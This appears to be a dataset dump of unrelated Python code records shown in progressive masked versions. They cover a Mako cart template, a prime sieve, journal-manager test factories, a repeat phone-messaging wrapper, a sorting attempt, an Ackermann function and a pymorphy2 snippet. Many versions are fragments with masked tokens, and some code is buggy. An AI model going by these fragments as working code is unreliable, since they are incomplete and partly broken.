if 'parent' not in context._data or not hasattr(context._data['parent'], 'content'):
context['self'].content(**pageargs)
__M_writer('\r\n\r\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_content(context,**pageargs):
__M_caller = context.caller_stack._push_frame()
try:
int = context.get('int', UNDEFINED)
str = context.get('str', UNDEFINED)
rentals = context.get('rentals', UNDEFINED)
def content():
return render_content(context)
request = context.get('request', UNDEFINED)
STATIC_URL = context.get('STATIC_URL', UNDEFINED)
__M_writer = context.writer()
__M_writer('\r\n\r\n<table class="table-responsive table-striped">\r\n <th></th>\r\n <th>#</th>\r\n <th>Name</th>\r\n <th>Price per Day</th>\r\n <th># of Days Rented</th>\r\n')
for item in rentals:
__M_writer(' <tr>\r\n <td><button rel="')
__M_writer(str( item.id ))
__M_writer('" class="btn btn-danger btn-sm deleter">Remove</button></td>\r\n <td class="img-col"><img class="shopping_cart_image" src="')
__M_writer(str(STATIC_URL))
__M_writer(str( item.photo.image ))
__M_writer('"/></td>\r\n <td class="name-col">')
__M_writer(str( noww ))
__M_writer('</td>\r\n <td class="price-col">')
__M_writer(str( item.price_per_day ))
__M_writer('</td>\r\n <td class="qty-col">')
__M_writer(str(int(request.session['rental_cart'][str(item.id)])))
__M_writer('</td>\r\n </tr>\r\n')
__M_writer('</table>\r\n<table id="button-table" class="table-responsive">\r\n <tr>\r\n <td id="space"></td>\r\n')
if request.user.is_authenticated():
__M_writer(' <td id=\'checkout\'><a href="/account.checkout" class="btn btn-warning">Checkout</a></td>\r\n')
else:
__M_writer(' <td id=\'checkout\'><a href="/mylogin.cartlogin" class="btn btn-warning">Checkout</a></td>\r\n')
__M_writer(' </tr>\r\n</table>\r\n')
return ''
finally:
context.caller_stack._pop_frame()
"""
__M_BEGIN_METADATA
{"uri": "/account.rentalcart.html", "line_map": {"70": 8, "71": 16, "72": 17, "73": 18, "74": 18, "75": 19, "76": 19, "77": 19, "78": 20, "79": 20, "80": 21, "81": 21, "82": 22, "83": 22, "84": 25, "85": 29, "86": 30, "87": 31, "88": 32, "89": 34, "95": 89, "33": 0, "16": 2, "45": 1, "46": 6, "47": 7, "48": 7, "53": 36, "59": 8}, "filename": "C:\\Users\\Cody\\Desktop\\Heritage\\chf\\templates/account.rentalcart.html", "source_encoding": "ascii"}
__M_END_METADATA
"""
| [
3,
4,
6,
7,
8
] |
30 | 5771f49ad5254588f1683a8d45aa81ce472bb562 |
def prime_sieve(n):
if n==2: return [2]
elif n<2: return []
    s = list(range(3, n + 1, 2))  # a list, because entries are zeroed below (Python 3)
mroot = n ** 0.5
    half = (n + 1) // 2 - 1  # floor division, so the code also runs on Python 3
i=0
m=3
while m <= mroot:
if s[i]:
            j = (m * m - 3) // 2
s[j]=0
while j<half:
s[j]=0
j+=m
i=i+1
m=2*i+3
return [2]+[x for x in s if x]
ps = prime_sieve(1000000)
def get_primes_upto(n):
i = 0
while ps[i] <= n:
i += 1
    return ps[0:i]  # ps[i] is the first prime above n, so exclude it
def trial_division(n):
if n == 1: return [1]
primes = get_primes_upto(int(n**0.5) + 1)
prime_factors = []
for p in primes:
if p*p > n: break
while n % p == 0:
prime_factors.append(p)
n //= p
if n > 1: prime_factors.append(n)
return prime_factors
def unique_factors(n):
return len(set(trial_division(n)))
fs = [0]
c = 0
for i in range(1,1000000):
c+= 1
fs.append(unique_factors(i))
if len(fs) > 4:
if fs[-4:] == [4,4,4,4]:
            print(c - 3)  # first of the four consecutive integers
break
| null | null | null | null | [
0
] |
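For context, the script above brute-forces the first run of four consecutive integers with four distinct prime factors each (Project Euler problem 47) and prints the first of the four. A quick sanity check, assuming the functions above are in scope — 644, 645, 646 is the classic run of three integers with three distinct prime factors each:

assert unique_factors(644) == 3  # 644 = 2^2 * 7 * 23
assert unique_factors(645) == 3  # 645 = 3 * 5 * 43
assert unique_factors(646) == 3  # 646 = 2 * 17 * 19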
31 | 44d87f112ab60a202e4c8d64d7aec6f4f0d10578 | <mask token>
class IssueTitleFactory(factory.Factory):
<mask token>
<mask token>
<mask token>
<mask token>
class IssueFactory(factory.Factory):
FACTORY_FOR = models.Issue
total_documents = 16
number = factory.Sequence(lambda n: '%s' % n)
volume = factory.Sequence(lambda n: '%s' % n)
is_trashed = False
publication_start_month = 9
publication_end_month = 11
publication_year = 2012
is_marked_up = False
suppl_text = '1'
journal = factory.SubFactory(JournalFactory)
@classmethod
def _prepare(cls, create, **kwargs):
section = SectionFactory()
issue = super(IssueFactory, cls)._prepare(create, **kwargs)
issue.section.add(section)
return issue
class UserProfileFactory(factory.Factory):
FACTORY_FOR = models.UserProfile
user = factory.SubFactory(UserFactory)
email_notifications = True
class SectionTitleFactory(factory.Factory):
FACTORY_FOR = models.SectionTitle
title = u'Artigos Originais'
language = factory.SubFactory(LanguageFactory)
section = factory.SubFactory(SectionFactory)
class RegularPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.RegularPressRelease
issue = factory.SubFactory(IssueFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class AheadPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.AheadPressRelease
journal = factory.SubFactory(JournalFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class PressReleaseTranslationFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseTranslation
language = factory.SubFactory(LanguageFactory)
press_release = factory.SubFactory(RegularPressReleaseFactory)
title = u'Yeah, this issue is amazing!'
content = u'Want to read more about...'
class PressReleaseArticleFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseArticle
press_release = factory.SubFactory(RegularPressReleaseFactory)
article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
class ArticleFactory(factory.Factory):
FACTORY_FOR = models.Article
xml = SAMPLE_XML
is_aop = False
domain_key = factory.Sequence(lambda n:
'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)
journal_title = u'Revista de Saúde Pública'
issn_ppub = u'0034-8910'
issn_epub = u'1518-8787'
xml_version = u'sps-1.2'
article_type = u'research-article'
doi = u'10.1590/S0034-8910.2014048004965'
class ArticleAssetFactory(factory.Factory):
FACTORY_FOR = models.ArticleAsset
article = factory.SubFactory(ArticleFactory)
file = File(SAMPLE_TIFF_IMAGE)
owner = u'SciELO'
use_license = u'Creative Commons - BY'
| <mask token>
class JournalFactory(factory.Factory):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
class SectionFactory(factory.Factory):
FACTORY_FOR = models.Section
code = factory.Sequence(lambda n: 'BJCE%s' % n)
journal = factory.SubFactory(JournalFactory)
class LanguageFactory(factory.Factory):
FACTORY_FOR = models.Language
iso_code = 'pt'
name = 'portuguese'
class IssueTitleFactory(factory.Factory):
"""
``issue`` must be provided
"""
FACTORY_FOR = models.IssueTitle
language = factory.SubFactory(LanguageFactory)
title = u'Bla'
class IssueFactory(factory.Factory):
FACTORY_FOR = models.Issue
total_documents = 16
number = factory.Sequence(lambda n: '%s' % n)
volume = factory.Sequence(lambda n: '%s' % n)
is_trashed = False
publication_start_month = 9
publication_end_month = 11
publication_year = 2012
is_marked_up = False
suppl_text = '1'
journal = factory.SubFactory(JournalFactory)
@classmethod
def _prepare(cls, create, **kwargs):
section = SectionFactory()
issue = super(IssueFactory, cls)._prepare(create, **kwargs)
issue.section.add(section)
return issue
class UserProfileFactory(factory.Factory):
FACTORY_FOR = models.UserProfile
user = factory.SubFactory(UserFactory)
email_notifications = True
class SectionTitleFactory(factory.Factory):
FACTORY_FOR = models.SectionTitle
title = u'Artigos Originais'
language = factory.SubFactory(LanguageFactory)
section = factory.SubFactory(SectionFactory)
class RegularPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.RegularPressRelease
issue = factory.SubFactory(IssueFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class AheadPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.AheadPressRelease
journal = factory.SubFactory(JournalFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class PressReleaseTranslationFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseTranslation
language = factory.SubFactory(LanguageFactory)
press_release = factory.SubFactory(RegularPressReleaseFactory)
title = u'Yeah, this issue is amazing!'
content = u'Want to read more about...'
class PressReleaseArticleFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseArticle
press_release = factory.SubFactory(RegularPressReleaseFactory)
article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
class ArticleFactory(factory.Factory):
FACTORY_FOR = models.Article
xml = SAMPLE_XML
is_aop = False
domain_key = factory.Sequence(lambda n:
'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)
journal_title = u'Revista de Saúde Pública'
issn_ppub = u'0034-8910'
issn_epub = u'1518-8787'
xml_version = u'sps-1.2'
article_type = u'research-article'
doi = u'10.1590/S0034-8910.2014048004965'
class ArticleAssetFactory(factory.Factory):
FACTORY_FOR = models.ArticleAsset
article = factory.SubFactory(ArticleFactory)
file = File(SAMPLE_TIFF_IMAGE)
owner = u'SciELO'
use_license = u'Creative Commons - BY'
| <mask token>
class UseLicenseFactory(factory.Factory):
<mask token>
<mask token>
<mask token>
<mask token>
class CollectionFactory(factory.Factory):
FACTORY_FOR = models.Collection
url = u'http://www.scielo.br/'
name = factory.Sequence(lambda n: 'scielo%s' % n)
address_number = u'430'
country = u'Brasil'
address = u'Rua Machado Bittencourt'
email = u'[email protected]'
name_slug = factory.Sequence(lambda n: 'scl%s' % n)
class JournalFactory(factory.Factory):
FACTORY_FOR = models.Journal
ctrl_vocabulary = u'decs'
frequency = u'Q'
scielo_issn = u'print'
print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))
eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))
init_vol = u'1'
title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'
title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'
short_title = u'ABCD.(São Paulo)'
editorial_standard = u'vancouv'
secs_code = u'6633'
init_year = u'1986'
acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))
pub_level = u'CT'
    init_num = u'1'
subject_descriptors = (
u"""
MEDICINA
CIRURGIA
GASTROENTEROLOGIA
GASTROENTEROLOGIA"""
.strip())
publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'
publisher_country = u'BR'
publisher_state = u'SP'
publication_city = u'São Paulo'
editor_address = (
u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'
)
editor_email = u'[email protected]'
creator = factory.SubFactory(UserFactory)
use_license = factory.SubFactory(UseLicenseFactory)
class SectionFactory(factory.Factory):
FACTORY_FOR = models.Section
code = factory.Sequence(lambda n: 'BJCE%s' % n)
journal = factory.SubFactory(JournalFactory)
class LanguageFactory(factory.Factory):
FACTORY_FOR = models.Language
iso_code = 'pt'
name = 'portuguese'
class IssueTitleFactory(factory.Factory):
"""
``issue`` must be provided
"""
FACTORY_FOR = models.IssueTitle
language = factory.SubFactory(LanguageFactory)
title = u'Bla'
class IssueFactory(factory.Factory):
FACTORY_FOR = models.Issue
total_documents = 16
number = factory.Sequence(lambda n: '%s' % n)
volume = factory.Sequence(lambda n: '%s' % n)
is_trashed = False
publication_start_month = 9
publication_end_month = 11
publication_year = 2012
is_marked_up = False
suppl_text = '1'
journal = factory.SubFactory(JournalFactory)
@classmethod
def _prepare(cls, create, **kwargs):
section = SectionFactory()
issue = super(IssueFactory, cls)._prepare(create, **kwargs)
issue.section.add(section)
return issue
class UserProfileFactory(factory.Factory):
FACTORY_FOR = models.UserProfile
user = factory.SubFactory(UserFactory)
email_notifications = True
class SectionTitleFactory(factory.Factory):
FACTORY_FOR = models.SectionTitle
title = u'Artigos Originais'
language = factory.SubFactory(LanguageFactory)
section = factory.SubFactory(SectionFactory)
class RegularPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.RegularPressRelease
issue = factory.SubFactory(IssueFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class AheadPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.AheadPressRelease
journal = factory.SubFactory(JournalFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class PressReleaseTranslationFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseTranslation
language = factory.SubFactory(LanguageFactory)
press_release = factory.SubFactory(RegularPressReleaseFactory)
title = u'Yeah, this issue is amazing!'
content = u'Want to read more about...'
class PressReleaseArticleFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseArticle
press_release = factory.SubFactory(RegularPressReleaseFactory)
article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
class ArticleFactory(factory.Factory):
FACTORY_FOR = models.Article
xml = SAMPLE_XML
is_aop = False
domain_key = factory.Sequence(lambda n:
'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)
journal_title = u'Revista de Saúde Pública'
issn_ppub = u'0034-8910'
issn_epub = u'1518-8787'
xml_version = u'sps-1.2'
article_type = u'research-article'
doi = u'10.1590/S0034-8910.2014048004965'
class ArticleAssetFactory(factory.Factory):
FACTORY_FOR = models.ArticleAsset
article = factory.SubFactory(ArticleFactory)
file = File(SAMPLE_TIFF_IMAGE)
owner = u'SciELO'
use_license = u'Creative Commons - BY'
| <mask token>
class UserFactory(factory.Factory):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
class GroupFactory(factory.Factory):
FACTORY_FOR = Group
name = factory.Sequence(lambda n: 'Group #%s' % n)
class SubjectCategoryFactory(factory.Factory):
FACTORY_FOR = models.SubjectCategory
term = 'Acoustics'
class StudyAreaFactory(factory.Factory):
FACTORY_FOR = models.StudyArea
study_area = 'Health Sciences'
class SponsorFactory(factory.Factory):
FACTORY_FOR = models.Sponsor
name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'
address = (
u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'
)
email = '[email protected]'
complement = ''
class UseLicenseFactory(factory.Factory):
FACTORY_FOR = models.UseLicense
license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)
reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'
disclaimer = (
u'<a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><img alt="Licença Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png" /></a><br />Este trabalho foi licenciado com uma Licença <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'
)
class CollectionFactory(factory.Factory):
FACTORY_FOR = models.Collection
url = u'http://www.scielo.br/'
name = factory.Sequence(lambda n: 'scielo%s' % n)
address_number = u'430'
country = u'Brasil'
address = u'Rua Machado Bittencourt'
email = u'[email protected]'
name_slug = factory.Sequence(lambda n: 'scl%s' % n)
class JournalFactory(factory.Factory):
FACTORY_FOR = models.Journal
ctrl_vocabulary = u'decs'
frequency = u'Q'
scielo_issn = u'print'
print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))
eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))
init_vol = u'1'
title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'
title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'
short_title = u'ABCD.(São Paulo)'
editorial_standard = u'vancouv'
secs_code = u'6633'
init_year = u'1986'
acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))
pub_level = u'CT'
    init_num = u'1'
subject_descriptors = (
u"""
MEDICINA
CIRURGIA
GASTROENTEROLOGIA
GASTROENTEROLOGIA"""
.strip())
publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'
publisher_country = u'BR'
publisher_state = u'SP'
publication_city = u'São Paulo'
editor_address = (
u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'
)
editor_email = u'[email protected]'
creator = factory.SubFactory(UserFactory)
use_license = factory.SubFactory(UseLicenseFactory)
class SectionFactory(factory.Factory):
FACTORY_FOR = models.Section
code = factory.Sequence(lambda n: 'BJCE%s' % n)
journal = factory.SubFactory(JournalFactory)
class LanguageFactory(factory.Factory):
FACTORY_FOR = models.Language
iso_code = 'pt'
name = 'portuguese'
class IssueTitleFactory(factory.Factory):
"""
``issue`` must be provided
"""
FACTORY_FOR = models.IssueTitle
language = factory.SubFactory(LanguageFactory)
title = u'Bla'
class IssueFactory(factory.Factory):
FACTORY_FOR = models.Issue
total_documents = 16
number = factory.Sequence(lambda n: '%s' % n)
volume = factory.Sequence(lambda n: '%s' % n)
is_trashed = False
publication_start_month = 9
publication_end_month = 11
publication_year = 2012
is_marked_up = False
suppl_text = '1'
journal = factory.SubFactory(JournalFactory)
@classmethod
def _prepare(cls, create, **kwargs):
section = SectionFactory()
issue = super(IssueFactory, cls)._prepare(create, **kwargs)
issue.section.add(section)
return issue
class UserProfileFactory(factory.Factory):
FACTORY_FOR = models.UserProfile
user = factory.SubFactory(UserFactory)
email_notifications = True
class SectionTitleFactory(factory.Factory):
FACTORY_FOR = models.SectionTitle
title = u'Artigos Originais'
language = factory.SubFactory(LanguageFactory)
section = factory.SubFactory(SectionFactory)
class RegularPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.RegularPressRelease
issue = factory.SubFactory(IssueFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class AheadPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.AheadPressRelease
journal = factory.SubFactory(JournalFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class PressReleaseTranslationFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseTranslation
language = factory.SubFactory(LanguageFactory)
press_release = factory.SubFactory(RegularPressReleaseFactory)
title = u'Yeah, this issue is amazing!'
content = u'Want to read more about...'
class PressReleaseArticleFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseArticle
press_release = factory.SubFactory(RegularPressReleaseFactory)
article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
class ArticleFactory(factory.Factory):
FACTORY_FOR = models.Article
xml = SAMPLE_XML
is_aop = False
domain_key = factory.Sequence(lambda n:
'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)
journal_title = u'Revista de Saúde Pública'
issn_ppub = u'0034-8910'
issn_epub = u'1518-8787'
xml_version = u'sps-1.2'
article_type = u'research-article'
doi = u'10.1590/S0034-8910.2014048004965'
class ArticleAssetFactory(factory.Factory):
FACTORY_FOR = models.ArticleAsset
article = factory.SubFactory(ArticleFactory)
file = File(SAMPLE_TIFF_IMAGE)
owner = u'SciELO'
use_license = u'Creative Commons - BY'
| # coding: utf-8
import os
import factory
import datetime
from journalmanager import models
from django.contrib.auth.models import Group
from django.core.files.base import File
_HERE = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')) as xml_file:
SAMPLE_XML = xml_file.read()
SAMPLE_TIFF_IMAGE = open(
os.path.join(_HERE, 'image_test', 'sample_tif_image.tif'))
with open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:
SAMPLE_XML_RELATED = xml_file.read()
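# factory_boy fixtures (pre-2.0 style: FACTORY_FOR on the class instead of a
# Meta inner class) for the journalmanager models.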
class UserFactory(factory.Factory):
FACTORY_FOR = models.User
@classmethod
def _setup_next_sequence(cls):
try:
return cls._associated_class.objects.values_list(
'id', flat=True).order_by('-id')[0] + 1
except IndexError:
return 0
username = factory.Sequence(lambda n: "jmanager_username%s" % n)
first_name = factory.Sequence(lambda n: "jmanager_first_name%s" % n)
last_name = factory.Sequence(lambda n: "jmanager_last_name%s" % n)
email = factory.Sequence(lambda n: "jmanager_email%[email protected]" % n)
password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'
is_staff = False
is_active = True
is_superuser = False
last_login = datetime.datetime(2000, 1, 1)
date_joined = datetime.datetime(1999, 1, 1)
class GroupFactory(factory.Factory):
FACTORY_FOR = Group
name = factory.Sequence(lambda n: "Group #%s" % n)
class SubjectCategoryFactory(factory.Factory):
FACTORY_FOR = models.SubjectCategory
term = 'Acoustics'
class StudyAreaFactory(factory.Factory):
FACTORY_FOR = models.StudyArea
study_area = 'Health Sciences'
class SponsorFactory(factory.Factory):
FACTORY_FOR = models.Sponsor
name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'
address = u'Av. Professor Lineu Prestes, 338 Cidade Universitária \
Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'
email = '[email protected]'
complement = ''
class UseLicenseFactory(factory.Factory):
FACTORY_FOR = models.UseLicense
license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)
reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'
disclaimer = u'<a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><img alt="Licença Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png" /></a><br />Este trabalho foi licenciado com uma Licença <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'
class CollectionFactory(factory.Factory):
FACTORY_FOR = models.Collection
url = u'http://www.scielo.br/'
name = factory.Sequence(lambda n: 'scielo%s' % n)
address_number = u'430'
country = u'Brasil'
address = u'Rua Machado Bittencourt'
email = u'[email protected]'
name_slug = factory.Sequence(lambda n: 'scl%s' % n)
class JournalFactory(factory.Factory):
FACTORY_FOR = models.Journal
ctrl_vocabulary = u'decs'
frequency = u'Q'
scielo_issn = u'print'
print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))
eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))
init_vol = u'1'
title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'
title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'
short_title = u'ABCD.(São Paulo)'
editorial_standard = u'vancouv'
secs_code = u'6633'
init_year = u'1986'
acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))
pub_level = u'CT'
    init_num = u'1'  # a stray trailing comma here would make this a tuple
subject_descriptors = u"""
MEDICINA
CIRURGIA
GASTROENTEROLOGIA
GASTROENTEROLOGIA""".strip()
publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'
publisher_country = u'BR'
publisher_state = u'SP'
publication_city = u'São Paulo'
editor_address = u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'
editor_email = u'[email protected]'
creator = factory.SubFactory(UserFactory)
use_license = factory.SubFactory(UseLicenseFactory)
class SectionFactory(factory.Factory):
FACTORY_FOR = models.Section
code = factory.Sequence(lambda n: 'BJCE%s' % n)
journal = factory.SubFactory(JournalFactory)
class LanguageFactory(factory.Factory):
FACTORY_FOR = models.Language
iso_code = 'pt'
name = 'portuguese'
class IssueTitleFactory(factory.Factory):
"""
``issue`` must be provided
"""
FACTORY_FOR = models.IssueTitle
language = factory.SubFactory(LanguageFactory)
title = u'Bla'
class IssueFactory(factory.Factory):
FACTORY_FOR = models.Issue
total_documents = 16
number = factory.Sequence(lambda n: '%s' % n)
volume = factory.Sequence(lambda n: '%s' % n)
is_trashed = False
publication_start_month = 9
publication_end_month = 11
publication_year = 2012
is_marked_up = False
suppl_text = '1'
journal = factory.SubFactory(JournalFactory)
@classmethod
def _prepare(cls, create, **kwargs):
section = SectionFactory()
issue = super(IssueFactory, cls)._prepare(create, **kwargs)
issue.section.add(section)
return issue
class UserProfileFactory(factory.Factory):
FACTORY_FOR = models.UserProfile
user = factory.SubFactory(UserFactory)
email_notifications = True
class SectionTitleFactory(factory.Factory):
FACTORY_FOR = models.SectionTitle
title = u'Artigos Originais'
language = factory.SubFactory(LanguageFactory)
section = factory.SubFactory(SectionFactory)
class RegularPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.RegularPressRelease
issue = factory.SubFactory(IssueFactory)
doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class AheadPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.AheadPressRelease
journal = factory.SubFactory(JournalFactory)
doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class PressReleaseTranslationFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseTranslation
language = factory.SubFactory(LanguageFactory)
press_release = factory.SubFactory(RegularPressReleaseFactory)
title = u'Yeah, this issue is amazing!'
content = u'Want to read more about...'
class PressReleaseArticleFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseArticle
press_release = factory.SubFactory(RegularPressReleaseFactory)
article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
class ArticleFactory(factory.Factory):
FACTORY_FOR = models.Article
xml = SAMPLE_XML
is_aop = False
domain_key = factory.Sequence(
lambda n: 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)
journal_title = u'Revista de Saúde Pública'
issn_ppub = u'0034-8910'
issn_epub = u'1518-8787'
xml_version = u'sps-1.2'
article_type = u'research-article'
doi = u'10.1590/S0034-8910.2014048004965'
class ArticleAssetFactory(factory.Factory):
FACTORY_FOR = models.ArticleAsset
article = factory.SubFactory(ArticleFactory)
file = File(SAMPLE_TIFF_IMAGE)
owner = u'SciELO'
use_license = u'Creative Commons - BY'
| [
20,
27,
31,
41,
47
] |
32 | 81dfdf0479fc1f136fa5153840d8c7015f9db676 | <mask token>
| <mask token>
loops(loop, phoneNumber, message)
| <mask token>
phoneNumber = 'fill the number'
message = 'fill with ur message'
loop = 1
loops(loop, phoneNumber, message)
| from theMachine import loops
phoneNumber = 'fill the number'
message = 'fill with ur message'
loop = 1
loops(loop, phoneNumber, message)
| # required !!!
# pip install selenium
# pip install webdriver-manager
from theMachine import loops
# fill the number and message
# you can fill the number with array
phoneNumber = "fill the number"
message = "fill with ur message"
loop = 1 # this how many u want to loop
loops(loop, phoneNumber, message) # input how many u want to loop
| [
0,
1,
2,
3,
4
] |
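Following the record's own hint that phoneNumber can be filled with an array, a hypothetical multi-recipient variant (sketch only — the actual semantics live in the local theMachine module):

phoneNumbers = ['fill number 1', 'fill number 2']  # hypothetical placeholders
for number in phoneNumbers:
    loops(loop, number, message)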
33 | 24de4f486d4e976850e94a003f8d9cbe3e518402 | <mask token>
| <mask token>
for x in a:
b.append(int(x))
print(b)
<mask token>
for i in range(l):
s = len(b[:i])
for j in range(s):
if b[s] < b[j]:
c = b[s]
b.pop(s)
b.insert(b.index(b[j]), c)
print(b, b[:i], b[s])
| a = input('Enter number')
a = a.split()
b = []
for x in a:
b.append(int(x))
print(b)
l = len(b)
c = 0
s = 0
for i in range(l):
s = len(b[:i])
for j in range(s):
if b[s] < b[j]:
c = b[s]
b.pop(s)
b.insert(b.index(b[j]), c)
print(b, b[:i], b[s])
| a= input("Enter number")
a= a.split()
b=[]
for x in a:
b.append(int(x))
print(b)
l=len(b)
c=0
s=0
for i in range(l):
s=len(b[:i])
for j in range(s):
if b[s]<b[j]:
c=b[s]
b.pop(s)
b.insert(b.index(b[j]),c)
print(b,b[:i],b[s])
| null | [
0,
1,
2,
3
] |
34 | 0ecd2a298203365b20b2369a99c3c1d7c0646f19 | # coding: utf-8
#ack program with the ackermann_function
""" ackermann_function """
def ack(m,n):
#n+1 if m = 0
    if m == 0:
return n + 1
#A(m−1, 1) if m > 0 and n = 0
    if m > 0 and n == 0:
return ack(m-1, 1)
#A(m−1, A(m, n−1)) if m > 0 and n > 0
if m > 0 and n > 0:
return ack(m-1, ack(m, n - 1))
if __name__ == "__main__":
expected = [[1,2,3,4,5],
[2,3,4,5,6],
[3,5,7,9,11],
[5,13,29,61,125]]
ok = True
for m in range(4):
for n in range(5):
actual = ack(m,n)
            if actual != expected[m][n]:
                print("error")
ok = False
if ok:
print "All tests pass"
| null | null | null | null | [
0
] |
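Plain recursion recomputes the same calls many times; a memoized sketch of the same function (my addition, assuming Python 3) keeps the small-m tests above instant:

from functools import lru_cache

@lru_cache(maxsize=None)
def ack(m, n):
    if m == 0:
        return n + 1
    if n == 0:
        return ack(m - 1, 1)
    return ack(m - 1, ack(m, n - 1))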
35 | a98be930058269a6adbc9a28d1c0ad5d9abba136 | <mask token>
def nums(phrase, morph=pymorphy2.MorphAnalyzer()):
""" согласование существительных с числительными, стоящими перед ними """
phrase = phrase.replace(' ', ' ').replace(',', ' ,')
numeral = ''
new_phrase = []
for word in phrase.split(' '):
if 'NUMB' in morph.parse(word)[0].tag:
numeral = word
if numeral:
word = str(morph.parse(word)[0].make_agree_with_number(abs(int(
numeral))).word)
new_phrase.append(word)
return ' '.join(new_phrase).replace(' ,', ',')
<mask token>
class Workout:
